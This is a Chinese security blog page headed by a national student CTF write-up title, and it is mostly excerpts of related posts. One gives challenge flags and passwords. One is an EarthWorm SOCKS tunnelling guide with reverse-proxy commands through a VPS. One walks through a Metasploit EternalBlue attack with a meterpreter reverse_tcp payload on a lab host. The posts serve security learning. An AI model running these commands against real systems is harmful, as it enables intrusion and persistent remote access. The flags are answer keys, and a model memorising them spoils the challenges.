第十九届全国大学生信息安全竞赛暨第三届 “长城杯”网数智安全大赛初赛WP
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 BenD!
相关推荐
2026-01-20
流量分析和Windows应急响应的部分原创题(含附件)
1.misc,先给一个压缩包伪装加密,然后提供一个图片,图片使用zsteg隐写提示文件分离的压缩包解压密码,然后解压出doro.doc,rodo.doc中藏一个图片,图片下方放入flag 解压密码:GIF_LSB_Ezflag 最终flag{Ctts_get_the_flag!!} 2.使用Windows搭建一个网站,进行应急响应 开机密码:xiaochen112233 2.流量分析应急响应—流量分析 1.hack的IP地址作为flag提交 flag{192.168.20.137} 2.hack访问的端口有哪些?从小到大排序提交,flag{xx,xx,xx,xx} flag{80,433} 3,hack找到的第一个可注入网页名称是什么? flag{shell.php} 4.hack上传的木马文件名称是什么? flag{1233.php} 5.hack的木马key是什么? flag{cmd} 6.靶机的系统版本是多少?hint:只需要写版本号即可 flag{6.1.7601} 7.hack执行的第一个命令是什么? flag{dir} 8.hack获取的开机密码是多少? flag{x...
2026-04-02
EarthWorm (EW) 内网穿透工具使用指南
EarthWorm (EW) 使用指南EarthWorm 是一款高性能的轻量级内网穿透工具,支持正向/反向 SOCKS5 代理及多级转发。 1. 基础环境 核心程序:单个二进制文件(如 ew_for_Win.exe, ew_for_linux64 等)。 核心参数:通过 -s 参数指定链路模式。 2. 常用操作场景场景 A:正向 SOCKS5 代理适用情况:目标机有公网 IP,且防火墙允许外部连接其特定端口。 在目标机上开启监听: 123456789101112 ./ew -s ssocksd -l 88881. **攻击机操作**:直接设置浏览器或代理工具(Proxifier)连接 `目标机IP:8888` 即可。### 场景 B:反向 SOCKS5 代理(最常用)**适用情况**:目标机在内网,无法从外部访问,但它可以主动连接外网。1. **在公网 VPS 上监听(转接隧道):** 将 1080 端口收到的代理请求转发给反连 8888 端口的机器./ew -s rcsocks -l 1080 -e 8888 123452. **在内网目标...
2024-09-23
记一个台湾同胞的网站漏洞
后续就是看我是大陆人,直接给我否了,然后漏洞就被修复了
2025-05-18
第二届“Parloo”CTF应急响应挑战赛-学生组(应急响应)
2025-05-07
WAF的常见绕过方法
1这个是网上看到的二向箔WAF资料,感觉挺好的,借鉴一下
2026-01-02
MSF获取Windows的shell后
扫描器的使用use auxiliary/scanner/smb/smb_ms17_010 攻击模块的使用下一步操作:发起攻击 (Exploit) 既然扫描器已经告诉你目标是“易受攻击”的,你现在的动作应该是从 辅助模块(Scanner) 切换到 攻击模块(Exploit)。 请按照以下顺序输入命令: 切换模块: Bash 1use exploit/windows/smb/ms17_010_eternalblue 设置目标 IP: Bash 1set RHOSTS 192.168.20.135 设置攻击载荷(通常默认就是这个,但建议检查一下): Bash 1set PAYLOAD windows/x64/meterpreter/reverse_tcp 设置你自己的 IP(Kali 的 IP,用于接收反弹回来的 Shell): Bash 12# 先在另一个终端用 ip addr 确认你的网卡 IPset LHOST [你的Kali的IP] 开火攻击: Bash 1exploit 进入Windows之后的操作 1. 基础环境与权限感知在任何操作...
